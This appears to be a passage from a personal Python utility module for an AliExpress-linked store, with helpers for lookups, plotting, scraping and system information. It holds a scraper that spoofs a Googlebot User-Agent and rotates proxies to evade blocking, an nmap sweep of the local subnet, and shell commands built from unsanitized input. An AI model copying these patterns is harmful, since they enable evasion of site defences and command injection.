'c3': 'AE,QA,SA,GU,BH,AF,GU,IQ,TT,MC,PR,LB,TR,DM,MV,KH,MT,KW',
'c4': 'AT,CH,DK,SK,CZ,BE,FR,NO,SE'}
country_code_dict = {
'AD': 'Andorra', 'AE': 'United Arab Emirates', 'AF': 'Afghanistan', 'AG': 'Antigua and Barbuda', 'AI': 'Anguilla', 'AL': 'Albania', 'AM': 'Armenia', 'AO': 'Angola', 'AQ': 'Antarctica', 'AR': 'Argentina', 'AS': 'American Samoa', 'AT': 'Austria', 'AU': 'Australia', 'AW': 'Aruba', 'AX': 'Aland Islands', 'AZ': 'Azerbaijan', 'BA': 'Bosnia and Herzegovina', 'BB': 'Barbados', 'BD': 'Bangladesh', 'BE': 'Belgium', 'BF': 'Burkina Faso', 'BG': 'Bulgaria', 'BH': 'Bahrain', 'BI': 'Burundi', 'BJ': 'Benin', 'BL': 'Saint Barthélemy', 'BM': 'Bermuda', 'BN': 'Brunei Darussalam', 'BR': 'Brazil', 'BS': 'Bahamas', 'BT': 'Bhutan', 'BV': 'Bouvet Island', 'BW': 'Botswana', 'BY': 'Belarus', 'BZ': 'Belize', 'CA': 'Canada', 'CC': 'Cocos (Keeling) Islands', 'CF': 'Central African Republic', 'CG': 'Congo', 'CH': 'Switzerland', 'CI': "Côte d'Ivoire", 'CK': 'Cook Islands', 'CL': 'Chile', 'CM': 'Cameroon', 'CN': 'China', 'CO': 'Colombia', 'CR': 'Costa Rica', 'CU': 'Cuba', 'CV': 'Cape Verde', 'CW': 'Curaçao', 'CX': 'Christmas Island', 'CY': 'Cyprus', 'CZ': 'Czech Republic', 'DE': 'Germany', 'DJ': 'Djibouti', 'DK': 'Denmark', 'DM': 'Dominica', 'DO': 'Dominican Republic', 'DZ': 'Algeria', 'EC': 'Ecuador', 'EE': 'Estonia', 'EG': 'Egypt', 'EH': 'Western Sahara', 'ER': 'Eritrea', 'ES': 'Spain', 'ET': 'Ethiopia', 'FI': 'Finland', 'FJ': 'Fiji', 'FK': 'Falkland Islands (Malvinas)', 'FO': 'Faroe Islands', 'FR': 'France', 'GA': 'Gabon', 'GB': 'United Kingdom', 'GD': 'Grenada', 'GE': 'Georgia', 'GF': 'French Guiana', 'GG': 'Guernsey', 'GH': 'Ghana', 'GI': 'Gibraltar', 'GL': 'Greenland', 'GM': 'Gambia', 'GN': 'Guinea', 'GP': 'Guadeloupe', 'GQ': 'Equatorial Guinea', 'GR': 'Greece', 'GS': 'South Georgia and the South Sandwich Islands', 'GT': 'Guatemala', 'GU': 'Guam', 'GW': 'Guinea-Bissau', 'GY': 'Guyana', 'HK': 'Hong Kong', 'HM': 'Heard Island and McDonald Islands', 'HN': 'Honduras', 'HR': 'Croatia', 'HT': 'Haiti', 'HU': 'Hungary', 'ID': 'Indonesia', 'IE': 'Ireland', 'IL': 'Israel', 'IM': 'Isle of Man', 'IN': 'India', 'IO': 'British Indian Ocean Territory', 'IQ': 'Iraq', 'IS': 'Iceland', 'IT': 'Italy', 'JE': 'Jersey', 'JM': 'Jamaica', 'JO': 'Jordan', 'JP': 'Japan', 'KE': 'Kenya', 'KG': 'Kyrgyzstan', 'KH': 'Cambodia', 'KI': 'Kiribati', 'KM': 'Comoros', 'KN': 'Saint Kitts and Nevis', 'KW': 'Kuwait', 'KY': 'Cayman Islands', 'KZ': 'Kazakhstan', 'LA': "Lao People's Democratic Republic", 'LB': 'Lebanon', 'LC': 'Saint Lucia', 'LI': 'Liechtenstein', 'LK': 'Sri Lanka', 'LR': 'Liberia', 'LS': 'Lesotho', 'LT': 'Lithuania', 'LU': 'Luxembourg', 'LV': 'Latvia', 'LY': 'Libya', 'MA': 'Morocco', 'MC': 'Monaco', 'ME': 'Montenegro', 'MF': 'Saint Martin (French part)', 'MG': 'Madagascar', 'MH': 'Marshall Islands', 'ML': 'Mali', 'MM': 'Myanmar', 'MN': 'Mongolia', 'MO': 'Macao', 'MP': 'Northern Mariana Islands', 'MQ': 'Martinique', 'MR': 'Mauritania', 'MS': 'Montserrat', 'MT': 'Malta', 'MU': 'Mauritius', 'MV': 'Maldives', 'MW': 'Malawi', 'MX': 'Mexico', 'MY': 'Malaysia', 'MZ': 'Mozambique', 'NA': 'Namibia', 'NC': 'New Caledonia', 'NE': 'Niger', 'NF': 'Norfolk Island', 'NG': 'Nigeria', 'NI': 'Nicaragua', 'NL': 'Netherlands', 'NO': 'Norway', 'NP': 'Nepal', 'NR': 'Nauru', 'NU': 'Niue', 'NZ': 'New Zealand', 'OM': 'Oman', 'PA': 'Panama', 'PE': 'Peru', 'PF': 'French Polynesia', 'PG': 'Papua New Guinea', 'PH': 'Philippines', 'PK': 'Pakistan', 'PL': 'Poland', 'PM': 'Saint Pierre and Miquelon', 'PN': 'Pitcairn', 'PR': 'Puerto Rico', 'PT': 'Portugal', 'PW': 'Palau', 'PY': 'Paraguay', 'QA': 'Qatar', 'RE': 'Réunion', 'RO': 'Romania', 'RS': 'Serbia', 'RU': 'Russian Federation', 'RW': 'Rwanda', 'SA': 'Saudi Arabia', 'SB': 'Solomon Islands', 'SC': 'Seychelles', 'SD': 'Sudan', 'SE': 'Sweden', 'SG': 'Singapore', 'SI': 'Slovenia', 'SJ': 'Svalbard and Jan Mayen', 'SK': 'Slovakia', 'SL': 'Sierra Leone', 'SM': 'San Marino', 'SN': 'Senegal', 'SO': 'Somalia', 'SR': 'Suriname', 'SS': 'South Sudan', 'ST': 'Sao Tome and Principe', 'SV': 'El Salvador', 'SX': 'Sint Maarten (Dutch part)', 'SY': 'Syrian Arab Republic', 'SZ': 'Swaziland', 'TC': 'Turks and Caicos Islands', 'TD': 'Chad', 'TF': 'French Southern Territories', 'TG': 'Togo', 'TH': 'Thailand', 'TJ': 'Tajikistan', 'TK': 'Tokelau', 'TL': 'Timor-Leste', 'TM': 'Turkmenistan', 'TN': 'Tunisia', 'TO': 'Tonga', 'TR': 'Turkey', 'TT': 'Trinidad and Tobago', 'TV': 'Tuvalu', 'UA': 'Ukraine', 'UG': 'Uganda', 'UM': 'United States Minor Outlying Islands', 'US': 'United States', 'UY': 'Uruguay', 'UZ': 'Uzbekistan', 'VA': 'Holy See (Vatican City State)', 'VC': 'Saint Vincent and the Grenadines', 'VN': 'Viet Nam', 'VU': 'Vanuatu', 'WF': 'Wallis and Futuna', 'WS': 'Samoa', 'YE': 'Yemen', 'YT': 'Mayotte', 'ZA': 'South Africa', 'ZM': 'Zambia', 'ZW': 'Zimbabwe'}
canada_province_codes = {
'AB' : 'Alberta', 'BC' : 'British Columbia', 'MB' : 'Manitoba', 'NB' : 'New Brunswick', 'NL' : 'Newfoundland and Labrador', 'NS' : 'Nova Scotia', 'NT' : 'Northwest Territories', 'NU' : 'Nunavut', 'ON' : 'Ontario', 'PE' : 'Prince Edward Island', 'QC' : 'Quebec', 'SK' : 'Saskatchewan', 'YT' : 'Yukon'}
def get_state(self,io):
return self.states[io]if(2==len(io))else(dict(zip(self.states.values(),self.states.keys()))[io])
def get_country(self,io):
return self.country_code_dict[io]if(2==len(io))else(dict(zip(self.country_code_dict.values(),self.country_code_dict.keys()))[io])
def get_canada_provinces(self,io):
return self.canada_province_codes[io]if(2==len(io))else(dict(zip(self.canada_province_codes.values(),self.canada_province_codes.keys()))[io])
globals().update(locals())
"""
print("AK -> %s" % (Locations().get_state("AK")))
print("Alaska -> %s" % (Locations().get_state("Alaska")))
print("AD -> %s" % (Locations().get_country("AD")))
print("Andorra -> %s" % (Locations().get_country("Andorra")))
print("AB -> %s" % (Locations().get_canada_provinces("AB")))
print("Alberta -> %s" % (Locations().get_canada_provinces("Alberta")))
"""
class My_Matplotlib(object):
def __init__(self):
import matplotlib.pyplot as plt
globals().update(locals())
self.plot_number = 211
def plot(self, *args, plot_type='scatterplot',**kwargs):
plt.subplot(self.plot_number)if(True==kwargs.get("newplot",False))else(None)
if plot_type == 'lineplot':
plt.plot(*args, '-', label=kwargs.get("label",None))
elif plot_type == 'scatterplot':
plt.plot(*args, '.')
elif plot_type == 'histogram':
plt.hist(*args, bins=20)
plt.xlabel(kwargs.get("xlabel","x"))
plt.ylabel(kwargs.get("ylabel","y"))
plt.title(kwargs.get("title","title"))
plt.legend()
if kwargs.get("newplot",False) == True: self.plot_number = self.plot_number + 1
return
""" ::: Caffeine example (12 hours) ::: """
x = My_Matplotlib()
x.plot([100, 200, 180, 140, 120, 110, 100, 100, 100, 100, 100, 100], newplot=False, label="alertness")
x.show()
def histogram_example(self):
population_ages = list(range(18,65))
ids = [x for x in range(len(population_ages))]
bins = list(range(10,100, 10))
plt.hist(population_ages, bins=10, histtype="bar", rwidth=0.8)
plt.show()
def pairplot(self, data, headers):
import pandas as pd
import seaborn as sb
import matplotlib.pyplot as plt
# %matplotlib tk
CSV().DictWriteWithHeaders("tmp.csv", data, headers, delimiter = "\t")
data = pd.read_csv("tmp.csv", delimiter = "\t")
sb.pairplot(data)
plt.show()
os.system("rm tmp.csv")
def barchart(self, x_indices=[0,1,2,3,4], y_indices=[10,5,10,5,10], **kwargs):
#x_indices=[0,1,2,3,4]
#y_indices=[10,5,10,5,10],
import matplotlib.pyplot as plt
plt.bar(x_indices, y_indices)
plt.ylabel(kwargs.get("ylabel"))if("ylabel" in kwargs)else(1)
plt.xticks(list(range(len(kwargs.get("xticks")))), kwargs.get("xticks"))if("xticks" in kwargs)else(1)
plt.title(kwargs.get("title"))if("title" in kwargs)else(1)
plt.show()
# kwargs may include:
# 1. align="center"
# 2. alpha="0.5"
def show(self):
plt.show()
class My_Meditations:
def __init__(self):
self.fuckboi = Browser()("sele",65)
def wtf(self):
OSA.log("LOL",tp=1-0)
class On_Exec:
""" shows that if you use exec whilst locals are there, post-exec locals stay as pre-exec, even if used in exec. so exec needs to use new keys. """
"pre-exec"
def versioncheck(x):
exec("import selenium; bprint(selenium.__version__); x = selenium.__version__",globals())
return x
def quadim1(x):
exec("y = 5",globals())
print(y)
return y
def quadim2(x):
exec("x = 5",globals())
print(x)
return x
def quadim3(x):
exec("y = 5",globals())
print(y)
return y
class Updater:
__init__ = lambda self: self.__dict__.update(
{
"GhostProductUpdate": lambda: 0==(Time()-Time(max(key("last_check",Filter(GhostProductUpdate,shop=Muta()().store_abbre))+[(Date()-100)()]))).days or GhostProduct().productghosts(Muta()().store_abbre),
"ProductsFeed": lambda: 0==(Time()-Time(max(key("last_check",Filter(ProductsFeed,shop=Muta()().store_abbre))+[(Date()-100)()]))).days or ProductsFeed().ProductsFeed(Muta()().store_abbre),
"LineitemsFeed": lambda: 0==(Time()-Time(max(key("last_check",Filter(LineitemsFeed,shop=Muta()().store_abbre))+[(Date()-100)()]))).days or LineitemsFeed().LineitemsFeed(Muta()().store_abbre),
"AdsetUpdates": lambda: lmap(lambda i: 2>=(Time()-Time(or_list(i.last_check,(Time()-100)()))).hours() or July_Adset_Utilities().update_advertisement_all(id=i.id), Filter(Adset,shop_abbreviation=Muta()().store_abbre)),
"LineitemUpdates": lambda: lmap(lambda i: 3>=(Time()-Time(or_list(i.last_check,(Time()-100)()))).hours() or Get(Lineitem,id=i.id).update_tracker_data(), Filter(Lineitem,shop=Muta()().store_abbre)),
"Aliexpressorder_update": lambda: 0==(Time()-Time(max(key("last_check",Filter(Aliexpressorder_update,shop=Muta()().store_abbre))+[(Date()-100)()]))).days or Aliexpressorderpager().get_urls((Date()-7)(),(Date()-0)(),get_order_info=False),
"ProductUpdates": lambda: lmap(lambda i: 2>=(Time()-Time(or_list(i.last_check,(Time()-100)()))).days or i.Refresh() , Filter(Product,shop=Muta()().store_abbre)),
"New_EmailUpdates": lambda: New_Email().new_email_set(Muta()().store_abbre),
"Aliexpressorder_event_update": lambda: Aliexpressorder_event().run(Muta()().store_abbre),
"Update_TertiaryActions": lambda: TertiaryAction().add(Muta()().store_abbre),
"Update_Payments": lambda: Payment().add(),
"Update_Payouts": lambda: Payout().add(),
})
def GhostProductUpdate(self):
for i in All(Shop):
GhostProduct().productghosts(i.shop_abbreviation)
def ProductsFeed(self):
for i in All(Shop):
ProductsFeed().ProductsFeed(i.shop_abbreviation)
def LineitemsFeed(self):
for i in All(Shop):
LineitemsFeed().LineitemsFeed(i.shop_abbreviation)
def AdsetUpdates(self):
for a in All(Shop):
for b in Filter(Adset,shop_abbreviation=a.shop_abbreviation):
July_Adset_Utilities().update_advertisement_all(id=b.id)
def LineitemUpdates(self):
for a in All(Shop):
for b in Filter(Lineitem,shop=a.shop_abbreviation):
Get(Lineitem,id=b.id).update_tracker_data()
"""
0==(Time()-Time(max(key("last_check",All(GhostProductUpdate))+[(Date()-100)()]))).days or GhostProduct().productghostsall()
0==(Time()-Time(max(key("last_check",All(Aliexpressorder_update))+[(Date()-100)()]))).days or Aliexpress_Core(ph=False).get_urls(7,0)
0==(Time()-Time(max(key("last_check",All(ProductsFeed))+[(Date()-100)()]))).days or ProductsFeed().ProductsFeedAll()
0==(Time()-Time(max(key("last_check",All(LineitemsFeed))+[(Date()-100)()]))).days or LineitemsFeed().LineitemsFeedAll()
lmap(lambda i: 2>=(Time()-Time(or_list(i.last_check,(Time()-100)()))).days or Aliexpress_Products().refresh_product_inventory(i.id) , All(Product))
Updater().GhostProductUpdate()
"""
class Pickles:
def savepickles(self,*args,**kws):
pickle.dump([i for i in args if type(i)!=str][0],open([i for i in args if type(i)==str][0],'wb'))
ifdo(lambda:kws.get('copypickles'),lambda:Pickles().savepickles([i for i in args if type(i)!=str][0],kws['copypickles']))
return args[0]
def loadpickles(self,*args,**kws):
ifdo(lambda:os.path.exists(args[0])==False,lambda:Pickles().savepickles(kws.get('default'),args[0]) )
return pickle.load(open(args[0],'rb'))
def solodump(self,obj,io,**kwargs):
pickles=Pickles().loadpickles(io,default=[])
identifier = kwargs['identifier']
print(obj,identifier)
possible_id=obj[identifier]
news=key(identifier,pickles)
q=None
if possible_id in news:
q=[i for i in pickles if i[identifier]==obj[identifier]][0]
else:
None
if q==None:
pickles.append(obj)
else:
indexer=pickles.index(q)
pickles[indexer]=obj
Pickles().savepickles(pickles,io,copypickles='store/%s%s'%(str(Time()).replace(':',''),io))
return obj
x=[{'id':1,'fn':2}]
Pickles().savepickles(x,'lol.pkl')
class Psutil(DecisionTree):
def tests(self):
builtin_print( "net_connections #1: %s" % str(self.net_connections()[0]) )
builtin_print( "net_io_counters: %s" % str(self.net_io_counters()) )
builtin_print( "sensors_battery: %s" % str(self.sensors_battery()) )
builtin_print( "boot_time: %s" % str(self.boot_time()) )
builtin_print( "virtual_memory: %s" % str(self.virtual_memory()) )
builtin_print( "cpu_count: %s" % str(self.cpu_count()) )
builtin_print( "disk_partitions: %s" % str(self.disk_partitions()) )
builtin_print( "disk_usage: %s" % str(self.disk_usage()) )
builtin_print( "GetHumanReadable: %s" % str(self.GetHumanReadable(self.disk_usage().total)) )
def get_network_interface(self):
x = subprocess.getoutput("route get 10.10.10.10")
redprint("route get 10.10.10.10\n==RESULT==\n\n{}\n\n".format(x))
return re.findall(r"interface: (.*)", x)[0]
def get_mac_lan_ip_address(self):
w = "ipconfig getifaddr {}".format(self.get_network_interface())
x = subprocess.getoutput(w)
redprint("{}\n==RESULT==\n\n{}\n\n".format(w,x))
return x
def nmap(self):
w = "sudo nmap -sP {}.1/24".format(Join(".",self.get_mac_lan_ip_address().split(".")[:3]))
x = subprocess.getoutput(w)
z = re.findall(r"Nmap scan report for (.*) .*\((.*)\)",x)
redprint("{}\n==result\n\n{}\n\n{}\n\n".format(w,x,json.dumps(z,indent=4)))
return z
def nonsudo_nmap(self):
w = "nmap -sP {}.1/24".format(Join(".",self.get_mac_lan_ip_address().split(".")[:3]))
x = subprocess.getoutput(w)
z = re.findall(r"Nmap scan report for (.*) .*\((.*)\)",x)
redprint("{}\n==result\n\n{}\n\n{}\n\n".format(w,x,json.dumps(z,indent=4)))
return z
def nmap_consistent(self,c=1):
while True:
if(len(self.nonsudo_nmap())) != c:
OSA().notify("lol")
def net_connections(self):
return psutil.net_connections(kind='inet')
def net_io_counters(self):
return psutil.net_io_counters(pernic=False, nowrap=True)
def sensors_battery(self):
return psutil.sensors_battery()
def boot_time(self):
psutil.boot_time()
import datetime
datetime.datetime.fromtimestamp(psutil.boot_time()).strftime("%Y-%m-%d %H:%M:%S")
""" '2018-08-29 04:23:28' """
def virtual_memory(self):
mem = psutil.virtual_memory()
return mem
def cpu_count(self):
return psutil.cpu_count()
""" 8 """
def disk_partitions(self):
return psutil.disk_partitions()
def disk_usage(self):
return psutil.disk_usage("/")
@staticmethod
def GetMachineReadable(HumanReadable):
suffixes=['B','KB','MB','GB','TB']
x = int(re.findall("[0-9]+",HumanReadable)[0])
y = re.findall(r"[a-zA-Z]+",HumanReadable)[0]
z = suffixes.index(y)
for i in range(z):
x = x*1024
return x
@staticmethod
def GetHumanReadable(size,precision=2):
suffixes=['B','KB','MB','GB','TB']
suffixIndex = 0
while size > 1024 and suffixIndex < 4:
suffixIndex += 1 #increment the index of the suffix
size = size/1024.0 #apply the division
return "%.*f%s"%(precision,size,suffixes[suffixIndex])
def GetLetterReadable(self,v):
return v if v<= 999 else(str(int(v/1000)) + "K")if(1000 <= v <= 999999)else(str(int(v/1000000)) + "M")if(1000000 <= v <= 999999999)else(str(int(v/1000000000)) + "B")if(1000000000 <= v <= 999999999999)else("?")
""" tests """
for i in [0,999,1000,50000,500000,5000000,5000000000,50000000,50000000000,5000000000000,6456498098,123491823,123123]:
print(x(i))
def SpeedTest(self, download = True, upload = True, verbose = True):
start_time = datetime.now()
import speedtest
servers = []
# If you want to test against a specific server
# servers = [1234]
s = speedtest.Speedtest()
s.get_servers(servers)
s.get_best_server()
if download == True:
s.download()
if upload == True:
s.upload()
s.results.share()
results_dict = s.results.dict()
results_dict = AttrDict(results_dict)
end_time = datetime.now()
elapsed_time = end_time.__sub__(start_time)
elapsed_time_seconds = elapsed_time.seconds
elapsed_time_microseconds = elapsed_time.microseconds / 1000000
elapsed_time_full = elapsed_time_seconds + elapsed_time_microseconds
elapsed_time_full = round(elapsed_time_full, 2)
time.sleep(1)
if verbose == True:
greenprint("speed test results time taken: %s seconds" % elapsed_time_full)
if verbose == True:
greenprint("")
time.sleep(1)
if verbose == True:
greenprint(":Results:")
download_speed = None
download_speed_readable = None
if download == True:
download_speed = results_dict.download
download_speed_readable = Psutil().GetLetterReadable(download_speed)
if verbose == True:
greenprint("download speed: %s" % download_speed_readable)
upload_speed = None
upload_speed_readable = None
if upload == True:
upload_speed = results_dict.upload
upload_speed_readable = Psutil().GetLetterReadable(upload_speed)
if verbose == True:
greenprint("upload speed: %s" % upload_speed_readable)
if download == True and upload == True:
return download_speed_readable, upload_speed_readable
elif download == True and upload == False:
return download_speed_readable
elif download == False and upload == True:
return upload_speed_readable
else:
return None
""" :Test:
results = []
results.append(Psutil().SpeedTest(download = True, upload = True))
results.append(Psutil().SpeedTest(download = True, upload = False))
results.append(Psutil().SpeedTest(download = False, upload = True))
results.append(Psutil().SpeedTest(download = False, upload = False))
assert len(results[0]) == 2
assert results[1]
assert results[2]
assert results[3] == None
greenprint(results)
"""
class RandomWord:
def __init__(self):
x = get_random_word()
print(x)
os.system("say '[[volm 0.35]] %s'"%(x))
[os.system("say '[[volm 0.35]] %s'"%(i)) for i in " ".join(x).split(" ")]
try:
y = dictionarymeaning(x)
print(y)
os.system('say """[[volm 0.35]] %s"""'%(y))
except Exception as e:
pass
RandomGeneratedWords().add(x)
print("")
class SkuAlgorithm:
a1 = lambda self, x, **kwargs: [setitem(kwargs,"a","".join(lmap(str,lmap(ord, shuffled(x))))),exec("assert len(kwargs['a']) <=255"),((kwargs["a"])if(kwargs["a"] not in key("nsku",All(Sku)))else(self.a1(x)) )][2]
a2 = lambda self, x, **kwargs: [setitem(kwargs,"a","-".join([generate_one_alphabetical_string(3),generate_one_alphabetical_string(4),generate_one_alphabetical_string(4)]).upper()),exec("assert len(kwargs['a']) <=255"),((kwargs["a"])if(kwargs["a"] not in key("nsku",All(Sku)))else(self.a2(x)))][2]
a3 = lambda self, x, **kwargs: [setitem(kwargs,"a","-".join([generate_one_random_number(3),generate_one_random_number(4),generate_one_random_number(4)]).upper()),exec("assert len(kwargs['a']) <=255"),((kwargs["a"])if(kwargs["a"] not in key("nsku",All(Sku)))else(self.a3(x)))][2]
a4 = lambda self, x, **kwargs: [setitem(kwargs,"a","-".join([generate_one_random_number(3),generate_one_alphabetical_string(4),generate_one_alphabetical_string(4)]).upper()),exec("assert len(kwargs['a']) <=255"),((kwargs["a"])if(kwargs["a"] not in key("nsku",All(Sku)))else(self.a4(x)))][2]
a5 = lambda self, x, **kwargs: [setitem(kwargs,"a","-".join([generate_one_random_number(7),generate_one_alphabetical_string(2),generate_one_alphabetical_string(5)]).upper()),exec("assert len(kwargs['a']) <=255"),((kwargs["a"])if(kwargs["a"] not in key("nsku",All(Sku)))else(self.a5(x)))][2]
a6 = lambda self, x, **kwargs: [setitem(kwargs,"a",(generate_one_alphabetical_string(2)+"{"+generate_one_random_number(4)+"}"+";"+generate_one_alphabetical_string(10)).upper()),exec("assert len(kwargs['a']) <=255"),((kwargs["a"])if(kwargs["a"] not in key("nsku",All(Sku)))else(self.a6(x)))][2]
a7 = lambda self, x, **kwargs: [setitem(kwargs,"a",("".join(lmap(str,[random.randrange(7,10) for i in range(3)]))+"$"+generate_one_alphanumeric_string(10)).upper()),exec("assert len(kwargs['a']) <=255"),((kwargs["a"])if(kwargs["a"] not in key("nsku",All(Sku)))else(self.a7(x)))][2]
rnda = lambda self: getattr(self, random.choice([i for i in dir(self) if i.startswith("a")]))
"""
blueprint(SkuAlgorithm().a1('["sku-1-123", "sku-2-asdfjpmv2912"]'))
blueprint(SkuAlgorithm().a2('["sku-1-123", "sku-2-asdfjpmv2912"]'))
blueprint(SkuAlgorithm().a3('["sku-1-123", "sku-2-asdfjpmv2912"]'))
blueprint(SkuAlgorithm().a4('["sku-1-123", "sku-2-asdfjpmv2912"]'))
blueprint(SkuAlgorithm().a5('["sku-1-123", "sku-2-asdfjpmv2912"]'))
blueprint(SkuAlgorithm().a6('["sku-1-123", "sku-2-asdfjpmv2912"]'))
blueprint(SkuAlgorithm().a7('["sku-1-123", "sku-2-asdfjpmv2912"]'))
"""
class Speech_Recognition:
@timeit
def recognize_sphinx(self, AUDIO_FILE, language="en-US"):
import speech_recognition as sr
# obtain path to "english.wav" in the same folder as this script
from os import path
#AUDIO_FILE = "out.wav"#path.join(path.dirname(path.realpath(__file__)), "out.wav")
# AUDIO_FILE = path.join(path.dirname(path.realpath(__file__)), "french.aiff")
# AUDIO_FILE = path.join(path.dirname(path.realpath(__file__)), "chinese.flac")
# use the audio file as the audio source
r = sr.Recognizer()
with sr.AudioFile(AUDIO_FILE) as source:
audio = r.record(source) # read the entire audio file
# recognize speech using Sphinx
try:
print("Sphinx thinks you said " + r.recognize_sphinx(audio, language="fr-FR"))
except sr.UnknownValueError:
print("Sphinx could not understand audio")
except sr.RequestError as e:
print("Sphinx error; {0}".format(e))
@timeit
def recognize_google(self, AUDIO_FILE = "out.wav", language="en-US"):
import speech_recognition as sr
# obtain path to "english.wav" in the same folder as this script
from os import path
#AUDIO_FILE = "out.wav"#path.join(path.dirname(path.realpath(__file__)), "out.wav")
# use the audio file as the audio source
r = sr.Recognizer()
with sr.AudioFile(AUDIO_FILE) as source:
audio = r.record(source) # read the entire audio file
# recognize speech using Google Speech Recognition
try:
# for testing purposes, we're just using the default API key
# to use another API key, use `r.recognize_google(audio, key="GOOGLE_SPEECH_RECOGNITION_API_KEY")`
# instead of `r.recognize_google(audio)`
print("Google Speech Recognition thinks you said " + r.recognize_google(audio))
except sr.UnknownValueError:
print("Google Speech Recognition could not understand audio")
except sr.RequestError as e:
print("Could not request results from Google Speech Recognition service; {0}".format(e))
class SED(DecisionTree):
def SED_RECURSIVELY(self):
import glob
dir = input("dir?: ")
os.chdir(dir)
ext = input("ext?: ")
old = input("old?: ")
new = input("new?: ")
os.chdir("../")
files = glob.glob('**/*%s'%ext, recursive=True)
print(files)
old = old.replace("/", "\\/")
new = new.replace("/", "\\/")
for fn in files:
system("sed -i '' -e s/%s/%s/g %s"%(old,new,fn))
def SED(self):
file = input("file?: ")
old = input("old?: ")
new = input("new?: ")
os.chdir("../")
old = old.replace("/", "\\\/")
new = new.replace("/", "\\\/")
the_string = "sed -i '' -e s/%s/%s/g %s"%(old,new,file)
print("the string: %s" % the_string)
os.system(the_string)
class SimpleRequester:
def __init__(self):
self.proxy_list = get_us_ip_list()
self.s = requests.Session()
self.s.headers = {"User-Agent": "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.1242123123.com/bot.html)", "authority": "www.aliexpress.com", "upgrade-insecure-requests": "1",}
self.count_current_tries = 0
def get(self, url, textNot="ø"*3, urlNot="ø"*3, status_codeNotNot=200, use_proxy=False, cookies={}):
[self.s.cookies.set(k,v) for k,v in cookies.items()]
r = None
if use_proxy == False:
try:
r = self.s.get(url, timeout=4)
redprint("\nProxy:%s\nUrl:%s\nr.text.find('%s'):%s\nr.url.find('%s'):%s\nstatus_code:%s\nstatus_codeNotNot:%s\ncount_current_tries:%s" % ("ø",url,textNot,r.text.find(textNot),urlNot,r.url.find(urlNot),r.status_code,status_codeNotNot,self.count_current_tries ))
except Exception as e:
redprint(str(e)[:100])
######
self.proxy_list.append(self.proxy_list.__getitem__(0 ))
self.proxy_list.__delitem__(0 )
# this may look confusing. and it is. now. keep in mind. what it looked like before, is this: 'class SimpleRequester:\n def __init__(self):\n self.proxy_list = get_us_ip_list()\n self.s = requests.Session()\n self.s.headers = {"User-Agent": "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.1242123123.com/bot.html)", "authority": "www.aliexpress.com", "upgrade-insecure-requests": "1",}\n\n def get(self, url, textNot="ø"*3, urlNot="ø"*3, status_codeNotNot=200, use_proxy=False, cookies={}):\n [self.s.cookies.set(k,v) for k,v in cookies.items()]\n\n r = None\n if use_proxy == False:\n r = self.s.get(url, timeout=4)\n redprint("\nProxy:%s\nUrl:%s\nr.text.find(\'%s\'):%s\nr.url.find(\'%s\'):%s\nstatus_code:%s\nstatus_codeNotNot:%s" % (self.proxy_list[0],url,textNot,r.text.find(textNot),urlNot,r.url.find(urlNot),r.status_code,status_codeNotNot ))\n else:\n r = self.s.get(url, proxies={"https":self.proxy_list[0]}, timeout=4)\n redprint("\nProxy:%s\nUrl:%s\nr.text.find(\'%s\'):%s\nr.url.find(\'%s\'):%s\nstatus_code:%s\nstatus_codeNotNot:%s" % (self.proxy_list[0],url,textNot,r.text.find(textNot),urlNot,r.url.find(urlNot),r.status_code,status_codeNotNot ))\n\n #redprint("textNot in r.text:%s\n"%(textNot in r.text), "urlNot in r.url:%s\n"% (urlNot in r.url), "status_codeNotNot != r.status_code:%s"%(status_codeNotNot != r.status_code))\n is_good = True\n if textNot in r.text:\n is_good = False\n if urlNot in r.url:\n is_good = False\n if status_codeNotNot != r.status_code:\n is_good = False\n\n if is_good == True:\n redprint("success:True")\n\n return r\n else:\n self.proxy_list.append(self.proxy_list.__getitem__(0 ))\n self.proxy_list.__delitem__(0 )\n return self.get(url,textNot, urlNot, status_codeNotNot=200, use_proxy=True)'
self.count_current_tries +=1
return self.get(url,textNot, urlNot, status_codeNotNot=200, use_proxy=True)
######
else:
try:
r = self.s.get(url, proxies={"https":self.proxy_list[0]}, timeout=4)
redprint("\nProxy:%s\nUrl:%s\nr.text.find('%s'):%s\nr.url.find('%s'):%s\nstatus_code:%s\nstatus_codeNotNot:%s\ncount_current_tries:%s" % (self.proxy_list[0],url,textNot,r.text.find(textNot),urlNot,r.url.find(urlNot),r.status_code,status_codeNotNot,self.count_current_tries ))
except Exception as e:
redprint(str(e)[:100])
######
self.proxy_list.append(self.proxy_list.__getitem__(0 ))
self.proxy_list.__delitem__(0 )
self.count_current_tries +=1
return self.get(url,textNot, urlNot, status_codeNotNot=200, use_proxy=True)
######
#redprint("textNot in r.text:%s\n"%(textNot in r.text), "urlNot in r.url:%s\n"% (urlNot in r.url), "status_codeNotNot != r.status_code:%s"%(status_codeNotNot != r.status_code))
is_good = True
if textNot in r.text:
is_good = False
if urlNot in r.url:
is_good = False
if status_codeNotNot != r.status_code:
#if r.status_code == 404: return SOUP("404")
if r.status_code == 404:
is_good = False
return r
if is_good == True:
redprint("success:True")
self.count_current_tries = 0
return r
else:
self.proxy_list.append(self.proxy_list.__getitem__(0 ))
self.proxy_list.__delitem__(0 )
self.count_current_tries +=1
return self.get(url,textNot, urlNot, status_codeNotNot=200, use_proxy=True)
class SublimeText_Themes(DecisionTree):
# (cbf52c (24bc44))
# (9c8996 (ffffff))
def __init__(self, ):
self.hexes = []
print(" a nice app: http://tmtheme-editor.herokuapp.com/#!/editor/theme/Monokai")
self.functions_sorted = ["normal", "change_colours", "change_comment_colours", "colorama", "change_background_colour"]
self.discovered_colours = {
"teal": "00efaf",
"darkteal": "00afaf", }
self.saved_colour_codes = """
66D9EF
00qfaf
b7e88a # a fun green
3b3d60
c95e46
b6af6c
502846
51c56d
24bc44
a9586a
c1ef4e
c58887
188711
395931 # a nice calm sea green
9d8bcc
83bd5a
e63f57
e343f0
71321a
395931
2a281a
ef6978
02f718 # sharp green
9c8996 # purplish
d4d4ae #
efd2b4 # pinkish
b3e7b2 #
a5ccd7 #
ffffff # white
db7d5a # sandstone aurauric red
1ebd01 # in the cut green
ff1700 # red
b00e2a # funner red
ebfdb4 # a surreal colour
cbf52c # a stay awake green and yellow
4fe1e5 # mega blue
deeabd # draconian white
c1faea # funny room blue
efc98e # desaddening orange
6f7f84 #
d6ddd5 2bfe16
dbf0f7 3ecefb
96f6ce d97462
f55608 bfaafe
d48ee5 0ecb9f
748054 fe3161
e04023 befbf6
af53f4 6d7d31
f59b00 de1939
